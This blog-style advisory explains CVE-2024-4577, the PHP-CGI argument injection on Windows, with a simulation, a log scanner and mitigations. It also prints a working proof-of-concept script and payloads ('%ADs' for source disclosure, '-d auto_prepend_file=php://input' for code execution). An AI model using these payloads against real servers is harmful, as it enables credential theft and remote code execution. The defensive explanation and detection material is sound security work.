In June 2024, DEVCORE researcher Orange Tsai disclosed a severe vulnerability in PHP when it is run as a CGI program under Apache on Windows. The issue, tracked as CVE-2024-4577, is an argument injection: by abusing how Windows converts between Unicode and the legacy ANSI code pages (its "Best-Fit" mapping), an unauthenticated attacker can smuggle PHP command-line options through the query string, bypass the protection PHP added in 2012 for CVE-2012-1823, and in common configurations achieve remote code execution.

In this article, we'll break down how this bug works, why it matters, how to check if you're affected, and examples of real-world exploits, including code snippets that demonstrate the vulnerability and how to mitigate it.

What’s the Core Vulnerability?

The flaw lives in how PHP-CGI on Windows receives its command-line arguments. The CGI specification lets the web server pass a query string that contains no "=" to the CGI program as command-line arguments, which is why PHP-CGI has, since the fix for CVE-2012-1823, refused arguments that begin with a hyphen. What that check did not account for is Windows "Best-Fit" mapping: when the OS converts a wide (Unicode) string into a narrow (ANSI/MBCS) code page, a character with no exact equivalent in that code page is replaced with the closest-looking one. This behaviour is deeply rooted in old code page mechanics.

Under certain code pages, Windows maps the visually harmless soft hyphen (U+00AD, sent on the wire as the single byte 0xAD) to an ordinary ASCII hyphen-minus (0x2D). The locales confirmed affected are Traditional Chinese (code page 950), Simplified Chinese (936) and Japanese (932). A hyphen is exactly the character PHP's command-line option parser keys on.

If you run PHP in CGI mode under Apache on Windows (php-cgi.exe, or php.exe exposed through an Action directive; the default XAMPP for Windows install does this, and it is common in shared hosting), a request whose query string contains %AD passes PHP's check for "-", is converted by Windows into a real "-" before it reaches the option parser, and is then treated as a command-line option. In other words, a web request can "smuggle" PHP command-line options into the CGI parser and make PHP do things it should never do for a web request.
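To make the sequence concrete, here is an added example (not code from the original post, from PHP or from Apache) that models the three stages in plain Python: Apache turning a "="-free query string into argv, PHP-CGI's hyphen guard, and the Windows Best-Fit conversion. The guard functions are approximations of PHP's real checks, the Best-Fit table is a constructed stand-in covering only the one mapping this bug uses, and all function names are assumptions of this example.

```python
"""
Model of the CVE-2024-4577 injection path (added example; simulation only).

  1. The CGI rule (RFC 3875, section 4.4): a query string containing no
     unencoded '=' is URL-decoded, split on '+' and handed to the CGI
     program as command-line arguments.
  2. PHP-CGI's pre-2024 guard (the CVE-2012-1823 fix), modelled here as
     "refuse any argument that begins with an ASCII hyphen".
  3. Windows Best-Fit conversion to the system ANSI code page, where the
     soft hyphen U+00AD becomes 0x2D ('-') on code pages 932, 936 and 950.
     BEST_FIT_HYPHEN_CODE_PAGES is a constructed stand-in for the real
     WideCharToMultiByte tables and covers only this one mapping.
"""
from urllib.parse import unquote_to_bytes

SOFT_HYPHEN = b"\xad"   # what Apache produces for %AD (U+00AD as a byte)
HYPHEN = b"-"

# Code pages whose Best-Fit table maps U+00AD to '-' (constructed subset).
BEST_FIT_HYPHEN_CODE_PAGES = {932, 936, 950}


def cgi_argv_from_query(query: str) -> list:
    """Stage 1: the argv Apache passes when the query string has no '='."""
    if "=" in query:
        return []                          # form data: stays in QUERY_STRING only
    return [unquote_to_bytes(part) for part in query.split("+") if part]


def guard_2012(argv: list) -> bool:
    """Stage 2 (vulnerable): accept argv unless an argument starts with '-'."""
    return not any(arg.startswith(HYPHEN) for arg in argv)


def guard_fixed(argv: list) -> bool:
    """Model of the 2024 fix: also refuse the soft hyphen, which Best-Fit
    would otherwise turn into '-' after this check has already run."""
    return not any(arg.startswith((HYPHEN, SOFT_HYPHEN)) for arg in argv)


def best_fit(argv: list, ansi_code_page: int) -> list:
    """Stage 3: what PHP's option parser finally sees after OS conversion."""
    if ansi_code_page not in BEST_FIT_HYPHEN_CODE_PAGES:
        return argv                        # e.g. 1252: 0xAD stays an odd byte
    return [arg.replace(SOFT_HYPHEN, HYPHEN) for arg in argv]


def simulate(query: str, ansi_code_page: int, fixed: bool = False) -> dict:
    """Run a query string through all three stages and report the outcome."""
    argv = cgi_argv_from_query(query)
    guard = guard_fixed if fixed else guard_2012
    if not guard(argv):
        return {"argv": argv, "accepted": False, "effective": []}
    return {"argv": argv, "accepted": True,
            "effective": best_fit(argv, ansi_code_page)}


if __name__ == "__main__":
    # The 2012 guard still stops the original CVE-2012-1823 payload.
    print(simulate("-s", 936))
    # %AD slips past it and becomes -s on a Simplified Chinese host...
    print(simulate("%ADs", 936))
    # ...but stays a harmless byte where Best-Fit does not map it.
    print(simulate("%ADs", 1252))
    # The -d form the post describes; %3d keeps the '=' encoded so Apache
    # still treats the query string as arguments.
    print(simulate("%ADd+auto_prepend_file%3dphp://input", 936))
    # With the fixed guard the soft hyphen is refused up front.
    print(simulate("%ADs", 936, fixed=True))
```

The important detail the model makes visible is ordering: the hyphen check runs on bytes that do not yet contain a hyphen, and the conversion that creates one happens afterwards, which is why the fix has to reject the soft hyphen itself rather than look harder for "-".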

Affected Versions:

PHP 8.3 before 8.3.8, PHP 8.2 before 8.2.20 and PHP 8.1 before 8.1.29, on Windows, when PHP is run as CGI (php-cgi.exe) or when php.exe is exposed to Apache through an Action directive. PHP 8.0, 7.x and 5.x are end-of-life and did not receive a fix, so every Windows install of those branches should be treated as vulnerable. mod_php and FastCGI/PHP-FPM deployments do not pass the query string as command-line arguments and are not affected.

What an attacker can do:

- Make PHP show your source code (the -s option), leaking passwords and API keys embedded in scripts
- Cause PHP to execute arbitrary code by passing -d flags that override ini directives, for example auto_prepend_file=php://input so that the POST body is run as PHP before the requested script

Example:
Passing a query string that contains the soft hyphen byte (%AD) followed by an option letter, so that after Best-Fit conversion PHP runs with -s, or with -d and a custom auto_prepend_file or other ini setting.

Say Apache is configured to run PHP through the CGI binary like this (a typical CGI setup; XAMPP for Windows ships an equivalent block in httpd-xampp.conf):

ScriptAlias /php-cgi/ "C:/php/"
AddHandler application/x-httpd-php .php
Action application/x-httpd-php "/php-cgi/php-cgi.exe"

An attacker sends a request such as

GET /index.php?ENCODED HTTP/1.1
Host: vulnerable.site

Where ENCODED is the percent-encoded soft hyphen, %AD, followed by a PHP option letter (for example %ADs). Because the query string contains no "=", Apache URL-decodes it and passes it to php-cgi.exe as command-line arguments; on a host whose ANSI code page is 936 (GBK, Simplified Chinese), 950 or 932, Windows Best-Fit mapping then turns the 0xAD byte into an ordinary hyphen (0x2D). Note that the injection travels in the query string, not the path: PATH_INFO is never passed as an argument.

Here's a self-contained example (let's say your server's ANSI code page is 936):

import requests

# The soft hyphen U+00AD is sent as the single raw byte %AD in the query
# string. Apache URL-decodes it to 0xAD; on a host whose ANSI code page is
# 932, 936 or 950, Windows Best-Fit mapping turns it into 0x2D, a real "-".
SOFT_HYPHEN = "%AD"

# 'flag' could be 's' (show source) or 'd' (set an ini directive)
php_flag = "s"  # Show PHP source code

# Build the malicious URL. The query string must contain no "=" so that
# Apache passes it to php-cgi.exe as command-line arguments. urllib/requests
# would re-encode a literal U+00AD as UTF-8 (%C2%AD), which is not the byte
# Best-Fit maps, so the percent-encoded byte is spliced in by hand.
url = f"http://vulnerable.site/index.php?{SOFT_HYPHEN}{php_flag}"
print(f"[*] Sending to URL: {url}")

r = requests.get(url)
print(r.text)

If the server is vulnerable and its ANSI code page is one of the affected ones, PHP sees a command line containing -s and returns the highlighted source of index.php instead of executing it.

Impact:

- Leaking your source code: stealing secrets such as database passwords, API keys or business logic
- Executing remote code: for example, passing -d auto_prepend_file=php://input and POSTing PHP code, which PHP then runs before the requested script
- Complete server compromise: the injected code runs as the web server's service account, so how far it gets depends on what that account can reach and on the other security layers on the host

How to check if you're affected:

1. Is PHP running on Windows? The bug is in Windows' character conversion, so Linux and other platforms are not affected.
2. Do you use PHP as a CGI binary (php-cgi.exe, or php.exe exposed via an Apache Action directive) rather than mod_php or FastCGI/FPM?
3. Is your system code page one affected by Best-Fit mapping (Traditional Chinese 950, Simplified Chinese 936, Japanese 932)?

Run chcp in your Windows command prompt. If you see 936, 950 or 932, you're at higher risk. Note that chcp reports the console's OEM code page; the conversion that matters here uses the system ANSI code page (the ACP value under HKLM\SYSTEM\CurrentControlSet\Control\Nls\CodePage), which for these three locales carries the same number. Those three are the locales the advisory confirmed, not an exhaustive list, so if the first two answers are yes, patch regardless of locale.
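Beyond the host checks above, exploitation attempts have a fixed shape in Apache access logs: a query string with no unencoded "=" whose arguments start with %AD. The scanner below is an added example, not part of the original post; the log lines in SAMPLE_LOG are constructed for illustration and come from no real incident, and the function names are assumptions of this example. It reconstructs the argv PHP would see after Best-Fit, and also flags the older plain "?-s" probes from CVE-2012-1823.

```python
"""
Spotting CVE-2024-4577 exploitation attempts in Apache access logs
(added example; SAMPLE_LOG is constructed, not real traffic).
"""
import re
from urllib.parse import unquote_to_bytes

# Combined/common log format; only the fields needed here are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample: two injection attempts, one harmless form parameter
# that merely contains %AD, and one legacy CVE-2012-1823 style probe.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Jun/2024:10:01:02 +0000] "GET /index.php?%ADs HTTP/1.1" 200 5120 "-" "python-requests/2.31"
203.0.113.7 - - [09/Jun/2024:10:01:05 +0000] "POST /index.php?%ADd+auto_prepend_file%3dphp://input HTTP/1.1" 200 43 "-" "python-requests/2.31"
198.51.100.4 - - [09/Jun/2024:10:02:00 +0000] "GET /index.php?page=%ADs HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [09/Jun/2024:10:03:00 +0000] "GET /about.php?-s HTTP/1.1" 200 900 "-" "curl/8.4"
"""


def classify_query(query: str):
    """Return (kind, argv) if the query string is an argument injection,
    otherwise (None, [])."""
    if not query or "=" in query:
        return None, []                    # ordinary form data, never argv
    raw = [unquote_to_bytes(p) for p in query.split("+") if p]
    if any(a.startswith(b"\xad") for a in raw):
        kind = "best-fit-soft-hyphen"      # CVE-2024-4577 shape
    elif any(a.startswith(b"-") for a in raw):
        kind = "plain-hyphen"              # CVE-2012-1823 shape, blocked since 2012
    else:
        return None, []
    # What the option parser would see on an affected code page.
    argv = [a.replace(b"\xad", b"-").decode("latin-1") for a in raw]
    return kind, argv


def scan(log_text: str) -> list:
    """Return one dict per suspicious request, in log order."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("target").partition("?")
        kind, argv = classify_query(query)
        if kind is None:
            continue
        hits.append({
            "ip": m.group("ip"), "ts": m.group("ts"),
            "method": m.group("method"), "path": path,
            "kind": kind, "argv": argv, "status": int(m.group("status")),
        })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} {hit["method"]} {hit["path"]} '
              f'[{hit["kind"]}] argv={hit["argv"]} -> {hit["status"]}')
```

A 200 response to a %ADs request with a body noticeably larger than the page normally returns is a strong sign the source dump succeeded; a POST carrying -d auto_prepend_file=php://input that returned 200 should be treated as code execution until proven otherwise.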

How to mitigate:

- Upgrade to PHP 8.3.8, 8.2.20 or 8.1.29 (or later); the older branches are unsupported and will not be patched.
- Switch to PHP-FPM or mod_php rather than CGI, if possible.
- If you cannot patch immediately, the PHP advisory suggests a mod_rewrite rule that returns 403 for any request whose query string begins with %AD (matched case-insensitively).
- Block access to /php-cgi/ and similar handlers from untrusted sources at the web server level. On XAMPP for Windows, comment out the ScriptAlias /php-cgi/ line in apache\conf\extra\httpd-xampp.conf if you do not need it.

Reference Patch

You can view the PHP security release here:
- PHP Changelog for 8.1.29
- Original Exploit Write-Up (watchTowr)
- Official CVE Details

Conclusion

CVE-2024-4577 is a textbook example of why character-set conversion and command-line parsing make a dangerous mix, especially on legacy platforms and less common language settings. If you run PHP on Windows, even as a test server, patch right away.

Use modern, secure deployment methods!

As always, never trust user input, especially when old encoding tricks can turn user data into executable magic.


*Stay safe!* If you enjoyed this deep dive and want more security and exploit breakdowns, contact us or follow our latest posts.

Timeline

Published on: 06/09/2024 20:15:09 UTC
Last modified on: 06/13/2024 04:15:16 UTC